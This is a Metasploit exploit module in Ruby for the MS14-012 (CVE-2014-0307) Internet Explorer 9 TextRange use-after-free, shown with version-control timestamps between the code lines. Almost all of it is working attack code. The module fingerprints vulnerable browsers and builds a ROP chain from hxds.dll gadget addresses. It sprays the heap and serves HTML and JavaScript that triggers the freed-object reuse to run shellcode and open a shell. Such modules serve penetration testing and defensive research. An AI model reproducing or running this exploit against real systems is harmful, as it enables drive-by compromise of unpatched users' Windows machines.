2014-03-18 22:55:56 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-03-18 22:55:56 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-07 08:56:58 +00:00
|
|
|
class Metasploit < Msf::Exploit::Remote
|
2014-03-18 22:55:56 +00:00
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::BrowserExploitServer
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2014-03-29 01:33:40 +00:00
|
|
|
'Name' => "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free",
|
2014-03-18 22:55:56 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
|
2014-03-24 17:16:59 +00:00
|
|
|
was most likely introduced in 2013, therefore only certain builds of MSHTML are
|
2014-03-18 22:55:56 +00:00
|
|
|
affected. In our testing with IE9, these vulnerable builds appear to be between
|
2014-03-24 17:16:59 +00:00
|
|
|
9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between
|
|
|
|
August 2013, when it was introduced, until the fix issued in early March 2014.
|
2014-03-18 22:55:56 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Jason Kratzer', # Original discovery
|
|
|
|
'sinn3r' # Port
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2014-03-20 03:13:23 +00:00
|
|
|
[ 'CVE', '2014-0307' ],
|
2014-03-18 22:55:56 +00:00
|
|
|
[ 'MSB', 'MS14-012' ]
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'BrowserRequirements' =>
|
|
|
|
{
|
|
|
|
:source => /script/i,
|
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
|
|
:ua_name => HttpClients::IE,
|
2014-03-25 16:35:35 +00:00
|
|
|
:office => "2010",
|
|
|
|
:ua_ver => '9.0',
|
2014-03-25 16:43:13 +00:00
|
|
|
:mshtml_build => lambda { |ver| ver.to_i.between?(16496, 16533) } # Covers MS13-Jul to MS14-Feb
|
2014-03-18 22:55:56 +00:00
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'Automatic',
|
|
|
|
{
|
|
|
|
# mov eax,dword ptr [edx+0C4h]; call eax
|
|
|
|
'Pivot' => 0x0c0d1020 # ECX
|
|
|
|
}
|
|
|
|
]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'Retries' => false, # You're too kind, tab recovery, I only need 1 shell.
|
|
|
|
'InitialAutoRunScript' => 'migrate -f'
|
|
|
|
},
|
|
|
|
'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
|
|
|
|
|
|
|
# hxds.dll
|
|
|
|
def get_payload
|
|
|
|
setup =
|
|
|
|
[
|
|
|
|
0x51C3B376, # rop nop
|
|
|
|
0x51C2046E, # pop edi; ret
|
|
|
|
0x51BE4A41, # xchg eax, esp; ret
|
|
|
|
].pack("V*")
|
|
|
|
|
|
|
|
# rop nops
|
|
|
|
45.times { setup << [0x51C3B376].pack('V*') }
|
|
|
|
|
|
|
|
setup << [
|
|
|
|
0x51C2046E, # pop edi ; ret
|
|
|
|
0x51BD28D4 # mov eax, [ecx], call [eax+8]
|
|
|
|
].pack('V*')
|
|
|
|
|
|
|
|
p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
|
|
|
|
|
|
|
|
Rex::Text.to_unescape(p)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit_html
|
|
|
|
template = %Q|<!DOCTYPE html>
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<meta http-equiv='Cache-Control' content='no-cache'/>
|
|
|
|
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
|
|
|
|
<script>
|
|
|
|
<%=js_property_spray%>
|
|
|
|
sprayHeap({shellcode:unescape("<%=get_payload%>")});
|
|
|
|
|
|
|
|
function hxds() {
|
|
|
|
try {
|
|
|
|
location.href = 'ms-help:';
|
|
|
|
} catch(e) {}
|
|
|
|
}
|
|
|
|
|
|
|
|
function strike() {
|
|
|
|
hxds();
|
|
|
|
var fake = "";
|
|
|
|
for (var i = 0; i < 12; i++) {
|
2014-03-20 16:13:57 +00:00
|
|
|
if (i==0) {
|
2014-03-18 22:55:56 +00:00
|
|
|
fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
fake += "\\u4141\\u4141";
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
var elements = [
|
|
|
|
'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
|
|
|
|
'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
|
|
|
|
];
|
|
|
|
|
|
|
|
for (var i = 0; i < elements.length; i++) {
|
|
|
|
var element = document.createElement(elements[i]);
|
|
|
|
document.body.appendChild(element);
|
|
|
|
}
|
2014-03-20 16:13:57 +00:00
|
|
|
|
2014-03-18 22:55:56 +00:00
|
|
|
var tRange = document.body.createTextRange();
|
|
|
|
tRange.moveToElementText(document.body.children[16]);
|
|
|
|
tRange.execCommand('InsertInputSubmit', true, null);
|
|
|
|
tRange.moveToElementText(document.body.children[0]);
|
|
|
|
tRange.moveEnd('character',4);
|
|
|
|
tRange.execCommand('InsertOrderedList', true, null);
|
|
|
|
tRange.select();
|
|
|
|
tRange.moveToElementText(document.body.children[0]);
|
|
|
|
tRange.moveEnd('character',13);
|
|
|
|
tRange.execCommand('Underline', true, null);
|
|
|
|
tRange.execCommand('RemoveFormat', true, null);
|
|
|
|
var fillObject = document.createElement('button');
|
|
|
|
fillObject.className = fake;
|
|
|
|
}
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body onload='strike();'></body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
|
|
|
|
|
return template, binding()
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_exploit(cli, request, target_info)
|
|
|
|
send_exploit_html(cli, exploit_html)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|